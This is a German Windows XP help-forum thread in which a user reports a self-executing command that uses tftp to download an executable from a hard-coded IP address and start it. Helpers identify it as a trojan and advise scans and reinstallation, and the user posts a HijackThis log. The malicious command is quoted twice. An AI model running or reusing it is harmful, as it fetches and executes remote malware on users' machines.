[erledigt]komischer cmd befehl

Diskutiere [erledigt]komischer cmd befehl im WinXP - Allgemeines Forum im Bereich WinXP - Allgemeines; huhu hab gerade so einen komischen befehl bei start--> ausführen drin gehabt %comspec% /c echo Repairing user32.dll & echo Please wait... & tftp...
#1
T

timlagezz

Threadstarter
Dabei seit
06.09.2004
Beiträge
118
Ort
Dessau
huhu hab gerade so einen komischen befehl bei start--> ausführen drin gehabt

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 38.98.159.34 GET xnzmt.exe & start xnzmt&

was heißten das?

das ding hat sich selber ausgeführt und denn is nod32 mein virenprogramm angesprung und es verschoben...

öhm ja was ist das was macht das und wie krieg ichs weg^^?
 
Zuletzt bearbeitet:
#2
Mike

Mike

i7-6700HQ
Team
Dabei seit
21.09.2006
Beiträge
24.351
Ort
in der Nähe eines Rechners
%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 38.98.159.34 GET xnzmt.exe & start xnzmt&
Wenn sich sowas von selbst in deine Konsole schreiben darf, dann solltest mal folgendes Überprüfen:

- Firewall aktiv
- Virenprogramm am neuesten Stand
- Servicepacks am neuesten Stand
- Router (falls vorhanden) Firewall checken
- falls WLAN - Verschlüselung und Passwort überprüfen (evtl. erneuern)

Welche Software wurde installiert bevor das Problem aufgetreten ist ??

Wegkriegen: Virenüberprüfung - NOD32 hats eh schon verschoben sollte also nicht so schlimm sein im Moment.

Poste mal einen HJT-Logfile (www.hijackthis.de) Download rechts oben im Link

Mike
 
#3
T

timlagezz

Threadstarter
Dabei seit
06.09.2004
Beiträge
118
Ort
Dessau
also windoof firewall is an...
nod is auch up to date macht der ja alles allein..

hier der log


Logfile of HijackThis v1.99.1
Scan saved at 19:58:23, on 02.03.2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16414)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Programme\DU Meter\DUMeter.exe
C:\Programme\Eset\nod32kui.exe
C:\Programme\DAEMON Tools\daemon.exe
C:\Programme\ATI Technologies\ATI.ACE\CLI.EXE
C:\WINDOWS\system32\CmWatch.exe
C:\Programme\cFos\cFosDNT.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Programme\MSN Messenger\MsnMsgr.Exe
C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE
C:\Programme\Messenger\msmsgs.exe
C:\Dokumente und Einstellungen\Daniel\Desktop\client\client.exe
C:\Programme\Ashampoo\Ashampoo Magical Defrag\bin\aDefragCtrl.exe
C:\Programme\Ashampoo\Ashampoo Magical Defrag\bin\aDefragService.exe
C:\Programme\Intel\IDU\awServ.exe
C:\Programme\Eset\nod32krn.exe
C:\Programme\No-IP\DUC20.exe
C:\Programme\CyberLink\Shared files\RichVideo.exe
C:\WINDOWS\system32\svchost.exe
C:\Programme\ATI Technologies\ATI.ACE\cli.exe
C:\WINDOWS\system32\vmnetdhcp.exe
C:\Programme\UltraVNC\winvnc.exe
C:\Programme\No-IP\DUC20.exe
C:\Programme\qip\qip.exe
C:\WINDOWS\system32\vmnat.exe
C:\Programme\FlashGet\flashget.exe
C:\Programme\uTorrent Extreme Leecher Edition\uTorrent v1.6\uTorrent Extreme LE (Report Seeder + Multi) v2.exe
C:\Programme\Mozilla Firefox\firefox.exe
C:\Dokumente und Einstellungen\Daniel\Desktop\hijackthis_199\HijackThis.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - (no file)
O2 - BHO: IeCatch5 Class - {2F364306-AA45-47B5-9F9D-39A8B94E7EF7} - C:\PROGRA~1\FlashGet\jccatch.dll
O2 - BHO: Idea2 SidebarBrowserMonitor Class - {45AD732C-2CE2-4666-B366-B2214AD57A49} - C:\Programme\Desktop Sidebar\sbhelp.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre1.5.0_09\bin\ssv.dll
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Programme\Gemeinsame Dateien\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: FlashFXP Helper for Internet Explorer - {E5A1691B-D188-4419-AD02-90002030B8EE} - C:\Programme\FlashFXP\IEFlash.dll
O2 - BHO: gFlash Class - {F156768E-81EF-470C-9057-481BA8380DBA} - C:\PROGRA~1\FlashGet\getflash.dll
O3 - Toolbar: FlashGet Bar - {E0E899AB-F487-11D5-8D29-0050BA6940E3} - C:\PROGRA~1\FlashGet\fgiebar.dll
O4 - HKLM\..\Run: [DU Meter] C:\Programme\DU Meter\DUMeter.exe
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\Run: [nod32kui] "C:\Programme\Eset\nod32kui.exe" /WAITSERVICE
O4 - HKLM\..\Run: [nod32upd] rundll32 "C:\Programme\Eset\fc_upd.dll",NOD32Ioctl
O4 - HKLM\..\Run: [DAEMON Tools] "C:\Programme\DAEMON Tools\daemon.exe" -lang 1033
O4 - HKLM\..\Run: [ATICCC] "C:\Programme\ATI Technologies\ATI.ACE\CLIStart.exe"
O4 - HKLM\..\Run: [SigmatelSysTrayApp] sttray.exe
O4 - HKLM\..\Run: [CmCardRun] C:\WINDOWS\system32\CmWatch.exe
O4 - HKLM\..\Run: [cFosDNT] C:\Programme\cFos\cFosDNT.exe
O4 - HKLM\..\Run: [CTFMon] C:\WINDOWS\system32\CTF\ctfmon.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Programme\K-Lite Codec Pack\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [MSConfig] C:\WINDOWS\PCHealth\HelpCtr\Binaries\MSConfig.exe /auto
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [msnmsgr] "C:\Programme\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - HKCU\..\Run: [MSMSGS] "C:\Programme\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [Uptime-Project] C:\Dokumente und Einstellungen\Daniel\Desktop\client\client.exe
O4 - Startup: Telefon- und Branchenbuch Frühjahr 2007 - Schnellstarter.lnk = E:\klicktel\KSTART32.EXE
O4 - Startup: Yahoo! Widget Engine.lnk = C:\Programme\Yahoo!\Yahoo! Widget Engine\YahooWidgetEngine.exe
O4 - Global Startup: Ashampoo Magical Defrag.lnk = C:\Programme\Ashampoo\Ashampoo Magical Defrag\bin\aDefragCtrl.exe
O8 - Extra context menu item: Alles mit FlashGet laden - C:\Programme\FlashGet\jc_all.htm
O8 - Extra context menu item: Mit FlashGet laden - C:\Programme\FlashGet\jc_link.htm
O8 - Extra context menu item: Nach Microsoft &Excel exportieren - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.5.0_09\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Konsole - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.5.0_09\bin\ssv.dll
O9 - Extra button: Subscribe in Desktop Sidebar - {09FE188B-6E85-479e-9411-51FB2220DF80} - C:\Programme\Desktop Sidebar\sbhelp.dll
O9 - Extra 'Tools' menuitem: Subscribe in Desktop Sidebar - {09FE188B-6E85-479e-9411-51FB2220DF80} - C:\Programme\Desktop Sidebar\sbhelp.dll
O9 - Extra button: Recherchieren - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\PROGRA~1\FlashGet\flashget.exe
O9 - Extra 'Tools' menuitem: &FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\PROGRA~1\FlashGet\flashget.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe
O9 - Extra button: Klicke hier um das Projekt xp-AntiSpy zu unterstützen - {0e921e80-267a-42aa-aee4-60b9a1222a44} - C:\Programme\xp-AntiSpy\sponsoring\sponsor.html (HKCU)
O9 - Extra 'Tools' menuitem: Unterstützung für xp-AntiSpy - {0e921e80-267a-42aa-aee4-60b9a1222a44} - C:\Programme\xp-AntiSpy\sponsoring\sponsor.html (HKCU)
O11 - Options group: [INTERNATIONAL] International*
O16 - DPF: {00B71CFB-6864-4346-A978-C0A14556272C} (Checkers Class) - http://messenger.zone.msn.com/binary/msgrchkr.cab31267.cab
O16 - DPF: {14B87622-7E19-4EA8-93B3-97215F77A6BC} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsPAClient.cab31267.cab
O16 - DPF: {2917297F-F02B-4B9D-81DF-494B6333150B} (Minesweeper Flags Class) - http://messenger.zone.msn.com/binary/MineSweeper.cab31267.cab
O16 - DPF: {5D6F45B3-9043-443D-A792-115447494D24} (UnoCtrl Class) - http://messenger.zone.msn.com/DE-DE/a-UNO1/GAME_UNO1.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1165308529358
O16 - DPF: {8E0D4DE5-3180-4024-A327-4DFAD1796A8D} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsClient.cab31267.cab
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://acs.pandasoftware.com/activescan/as5free/asinst.cab
O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (ZoneIntro Class) - http://messenger.zone.msn.com/binary/ZIntro.cab53083.cab
O16 - DPF: {BFF1950D-B1B4-4AE8-B842-B2CCF06D9A1B} (Zylom Games Player) - http://game11.zylom.com/activex/zylomgamesplayer.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{2175517B-E2D9-4DBC-AEF1-80EB000398CE}: NameServer = 217.237.149.205 217.237.150.188
O18 - Protocol: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\MSNMES~1\MSGRAP~1.DLL
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\MSNMES~1\MSGRAP~1.DLL
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\GEMEIN~1\Skype\SKYPE4~1.DLL
O23 - Service: AshampooDefragService - - C:\Programme\Ashampoo\Ashampoo Magical Defrag\bin\aDefragService.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: Admin Works Agent X8 (AWService) - OSA Technologies Inc., An Avocent Company - C:\Programme\Intel\IDU\awServ.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Programme\Gemeinsame Dateien\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: Process Monitor (LVPrcSrv) - Logitech Inc. - c:\programme\gemeinsame dateien\logishrd\lvmvfm\LVPrcSrv.exe
O23 - Service: LVSrvLauncher - Logitech Inc. - C:\Programme\Gemeinsame Dateien\LogiShrd\SrvLnch\SrvLnch.exe
O23 - Service: NOD32 Kernel Service (NOD32krn) - Eset - C:\Programme\Eset\nod32krn.exe
O23 - Service: NoIPDUCService - Vitalwerks LLC - C:\Programme\No-IP\DUC20.exe
O23 - Service: Cyberlink RichVideo Service(CRVS) (RichVideo) - Unknown owner - C:\Programme\CyberLink\Shared files\RichVideo.exe
O23 - Service: ServiceLayer - Nokia. - C:\Programme\PC Connectivity Solution\ServiceLayer.exe
O23 - Service: VMware Authorization Service (VMAuthdService) - VMware, Inc. - N:\VMware Workstation\vmware-authd.exe
O23 - Service: VMware DHCP Service (VMnetDHCP) - VMware, Inc. - C:\WINDOWS\system32\vmnetdhcp.exe
O23 - Service: VMware Virtual Mount Manager Extended (vmount2) - VMware, Inc. - C:\Programme\Gemeinsame Dateien\VMware\VMware Virtual Image Editing\vmount2.exe
O23 - Service: VMware NAT Service - VMware, Inc. - C:\WINDOWS\system32\vmnat.exe
O23 - Service: XAMPP Service (XAMPP) - Unknown owner - C:\Programme\xampp\service.exe (file missing)
 
#4
Mike

Mike

i7-6700HQ
Team
Dabei seit
21.09.2006
Beiträge
24.351
Ort
in der Nähe eines Rechners
Dein HJT-Logfile ist "eigentlich" Sauber. Es läuft zwar viel Unsinniges - Solltest also deinen PC mal überprüfen, ob wirklich alles notwendig ist.

mit autoruns von Downloadbereich kannst du überprüfen, was der PC wirklich beim booten "anstellt" ;) und bereinigen.

Du sollstest in diesem programm aber nur die LOGON-Sektion durchschauen, sonst kannst du dir zuviel löschen, was dir unbekannt ist.

Sollte keine weitere Meldung kommen, wird hoffentlich alles passen und NOD hat es bereinigt.
Solltest aber einen kompletten Systemscan mit NOD machen
 
#5
T

timlagezz

Threadstarter
Dabei seit
06.09.2004
Beiträge
118
Ort
Dessau
hab das alles gemacht..
jetz kommt aber das...
%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 38.98.159.34 GET rzomrrk.exe & start rzomrrk&
 
#6
Mike

Mike

i7-6700HQ
Team
Dabei seit
21.09.2006
Beiträge
24.351
Ort
in der Nähe eines Rechners
Das klingt nicht gut - die Meldung selbst sagt mir nicht 100% etwas - allerdings sehe ich da eine IP-Adresse (siehe Bild) die mich nervös macht :wacko:

dein Rechner will tftp machen (Das ist ein einfacher Dateizugriff - nur lesen und schreiben).
Da ist was echt nicht in Ordnung.
Empfehle Reparaturinstallation bzw. Neuinstallation

Anleitung RepInstallation ...
 
Zuletzt bearbeitet von einem Moderator:
#7
O

Office2007

Gast
Die IP führt zu einer viagra-seite. alles formatieren, windows neu installieren
 
#8
P

Phraser

Dabei seit
28.10.2006
Beiträge
2.767
Hey Mike, was hat es sich mit der Lokalisierung der IP auf sich?
Ist das verrlässlich? Wo geb ich das ein?
 
#9
Mike

Mike

i7-6700HQ
Team
Dabei seit
21.09.2006
Beiträge
24.351
Ort
in der Nähe eines Rechners
#10
BrandyJr

BrandyJr

Dabei seit
02.11.2003
Beiträge
3.707
Alter
37
Ort
Berlin
Achtung, dabei handelt es sich DEFINITIV um einen Virus bzw. Trojaner!
(siehe Screenshot)

Und wenn dein PC das automatisch durchführt, dann solltest du alle Anti-Spywareprogramme, die es so gibt mal durchführen lassen.
Oder du installierst deinen PC einfach neu. :D
 

Anhänge

#11
Bullayer

Bullayer

Schwergewicht
Dabei seit
19.07.2006
Beiträge
24.140
Ort
DE-RLP-COC
Festplattenpartitionen löschen, neu partitionieren, formatieren und Windows neu installieren ist wohl hier die schnellste Lösung.
 
#12
M

MvSt1234

Dabei seit
24.04.2006
Beiträge
1.060
Alter
46
Ort
Dorsten
Aber auch die brutalste (Datenverlust...)

Lass Spybot S&D laufen und in jedem Fall den Teatimer aktivieren! Der verhindert unerlaubte / ungewollte Änderungen in der Registry.
Damit kannst Du evtl eine weitere Verbreitung des Trojaners verhindern.

Zusätzlich solltest Du den Befehl "sfc/ scannow" ausführen und schon mal Deine WinXP CD bereit halten.
Der Befehl sfc sorgt für eine Reparatur der Systemdateien und stellt diese bei Bedarf von CD wieder her.

Wenn Dein NOD nichts weiteres findet, lass nen anderes AV-Proggi zusätzlich mal drüberlaufen.


Viel Erfolg !
 
#13
Mike

Mike

i7-6700HQ
Team
Dabei seit
21.09.2006
Beiträge
24.351
Ort
in der Nähe eines Rechners
Lass Spybot S&D laufen und in jedem Fall den Teatimer aktivieren! Der verhindert unerlaubte / ungewollte Änderungen in der Registry.
Damit kannst Du evtl eine weitere Verbreitung des Trojaners verhindern.
Aber nur auf dem eigenen Rechner :( und entfernt nicht den Virus!

Zusätzlich solltest Du den Befehl "sfc/ scannow" ausführen und schon mal Deine WinXP CD bereit halten.
Der Befehl sfc sorgt für eine Reparatur der Systemdateien und stellt diese bei Bedarf von CD wieder her.
...entfernt aber nicht den Virus!

Aber auch die brutalste (Datenverlust...)
Wieso

- Datensicherung (kann ruhig ver"virt" sein)
- NEUinstallation
- VIRENPROGRAMM und Updates installieren
- Spybot&Destroy installieren (ohne Teatimer, sonst kann man die halben Programme nicht installieren)
- Servicepacks installieren
- DATENRÜCKSICHERUNG (Virus wird entfernt, da Virenprogramm richtig arbeitet)

Danach sollte eigentlich alles passen.

Am besten wäre natürlich vorher (vor der ganzen Aktion) einen OFFLINE-Virenüberprüfung z.B. mit einer bartPE-CD mit einem AV-Programm zu machen.

Mike
 
Thema:

[erledigt]komischer cmd befehl

[erledigt]komischer cmd befehl - Ähnliche Themen

  • Aufgaben werden fälschlicherweise als erledigt angezeigt

    Aufgaben werden fälschlicherweise als erledigt angezeigt: Hallo, meine Aufgaben werden fälschlicherweise als erledigt angezeigt. Wenn ich sie öffne, dann sind sie "nicht begonnen", erscheinen aber...
  • Daten weg? HAT SICH ERLEDIGT!!!! DANKE

    Daten weg? HAT SICH ERLEDIGT!!!! DANKE: Habe seit gestern einen neuen Laptop - nun finde ich meine auf OneDrive und Google Maps (Bilder und Zeitachse) gespeicherten Daten nicht mehr -...
  • [Erledigt] Steam client unbrauchbar

    [Erledigt] Steam client unbrauchbar: Hallo, seit ein paar Tagen läuft der Steam client nicht mehr richtig. Seit heute ist er nun unbrauchbar. Bisher öffnete das Programmfenster...
  • Erledigt: Checkdisk mit jedem neuen Windows-7-Start, wenn ich vorher Windows 10 gestartet hatte

    Erledigt: Checkdisk mit jedem neuen Windows-7-Start, wenn ich vorher Windows 10 gestartet hatte: Hallo Zusammen, Ich habe drei Betriebssysteme und eine Speicherpartition auf 2 Festplatten zu je 1 TB verteilt. 1 Platte: 75 % Linux Mint...
  • erledigt

    erledigt: erledigt
  • Ähnliche Themen

    Oben